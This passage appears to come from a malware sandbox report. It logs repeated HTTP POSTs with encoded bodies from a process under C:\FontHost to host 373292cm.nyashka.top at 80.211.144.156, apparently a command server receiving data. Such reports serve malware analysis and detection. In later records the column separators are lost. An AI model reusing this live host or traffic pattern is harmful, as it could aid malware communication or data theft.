                              Aug 25, 2024 15:43:44.014612913 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:43 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              16 | 192.168.2.5 | 59872 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:44.137904882 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:43:44.491388083 CEST | 2504 | OUT
                              Aug 25, 2024 15:43:44.806468010 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:44.934180975 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:44 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              17 | 192.168.2.5 | 59873 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:45.083600998 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:45.437380075 CEST | 2504 | OUT
                              Aug 25, 2024 15:43:45.778043985 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:45.911480904 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:45 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              18 | 192.168.2.5 | 59874 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:46.044668913 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:46.397670031 CEST | 2504 | OUT | Data: [encoded request body]
                              Aug 25, 2024 15:43:46.717950106 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:46.855016947 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:46 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              19 | 192.168.2.5 | 59875 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:46.981221914 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:47.337042093 CEST | 2504 | OUT | Data: [encoded request body]
                              Aug 25, 2024 15:43:47.649580002 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:47.778722048 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:47 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              20 | 192.168.2.5 | 59876 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:47.902379036 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:48.259783030 CEST | 2504 | OUT | Data: [encoded request body]


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              21 | 192.168.2.5 | 59877 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:48.560653925 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:48.913254976 CEST | 1828 | OUT | Data: [encoded request body]
                              Aug 25, 2024 15:43:49.246128082 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:49.357942104 CEST | 308 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              22 | 192.168.2.5 | 59878 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:48.682627916 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:49.038275957 CEST | 2500 | OUT | Data: [encoded request body]
                              Aug 25, 2024 15:43:49.116322994 CEST | 1236 | OUT | Data: [encoded request body]
                              Aug 25, 2024 15:43:49.376949072 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:49.586472034 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              23 | 192.168.2.5 | 59879 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:49.716254950 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:43:50.070076942 CEST | 2504 | OUT | Data: [encoded request body]
                              Aug 25, 2024 15:43:50.391168118 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:50.518053055 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:49 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              24 | 192.168.2.5 | 59880 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:50.655154943 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:51.007023096 CEST | 2504 | OUT | Data: [encoded request body]
                              Aug 25, 2024 15:43:51.322968960 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:51.449501038 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              25 | 192.168.2.5 | 59881 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:51.573580980 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:51.929222107 CEST | 2504 | OUT | Data: [encoded request body]
                              Aug 25, 2024 15:43:52.248102903 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:52.383662939 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:51 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              26 | 192.168.2.5 | 59882 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:52.511118889 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:52.866420984 CEST | 2504 | OUT | Data: [encoded request body]
                              Aug 25, 2024 15:43:53.206073046 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:53.336045980 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:52 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              27 | 192.168.2.5 | 59883 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:53.898179054 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:54.257236958 CEST | 2504 | OUT | Data: [encoded request body]


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              28 | 192.168.2.5 | 59884 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:54.379791021 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:54.726849079 CEST | 1828 | OUT | Data: [encoded request body]
                              Aug 25, 2024 15:43:55.068360090 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:55.203455925 CEST | 308 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:54 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              29 | 192.168.2.5 | 59885 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:54.556386948 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:54.913705111 CEST | 2504 | OUT | Data: [encoded request body]
                              Aug 25, 2024 15:43:55.223344088 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:55.357815981 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:54 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              30 | 192.168.2.5 | 59886 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:55.481884003 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:43:55.836592913 CEST | 2504 | OUT | Data: [encoded request body]
                              Aug 25, 2024 15:43:56.164293051 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:56.301558018 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:55 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              31 | 192.168.2.5 | 59887 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:56.448374033 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:56.804719925 CEST | 2504 | OUT | Data: [encoded request body]
                              Aug 25, 2024 15:43:57.133373022 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:57.265538931 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:56 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              32 | 192.168.2.5 | 59888 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:57.388835907 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:57.742147923 CEST | 2500 | OUT | Data: [encoded request body]
                              Aug 25, 2024 15:43:58.076239109 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:58.210088968 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:57 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              33 | 192.168.2.5 | 59889 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:58.342866898 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:58.747955084 CEST | 2504 | OUT | Data: [encoded request body]
                              Aug 25, 2024 15:43:59.017108917 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:59.214831114 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:58 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              34192.168.2.55989080.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:59.351645947 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:59.711064100 CEST2500OUT
                              Aug 25, 2024 15:44:00.016813993 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:00.215145111 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              35192.168.2.55989180.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:00.217914104 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1816
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:00.570620060 CEST1816OUT
                              Aug 25, 2024 15:44:00.909636974 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:01.043731928 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:00 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              36192.168.2.55989280.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:00.347337961 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:00.695502996 CEST2504OUT
                              Aug 25, 2024 15:44:01.003021955 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:01.142117023 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:00 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              37192.168.2.55989380.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:01.279098034 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:01.689753056 CEST2504OUT
                              Aug 25, 2024 15:44:01.971685886 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:02.173211098 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:01 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              38192.168.2.55989480.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:02.311347008 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:02.663439989 CEST2504OUT
                              Aug 25, 2024 15:44:02.977299929 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:03.110013008 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:02 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              39192.168.2.55989580.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:03.247137070 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:03.600975990 CEST2504OUT
                              Aug 25, 2024 15:44:03.930326939 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:04.061584949 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:03 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              40192.168.2.55989680.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:04.499299049 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:04.850905895 CEST2504OUT
                              Aug 25, 2024 15:44:05.196268082 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:05.333832979 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:04 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              41192.168.2.55989780.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:05.490879059 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
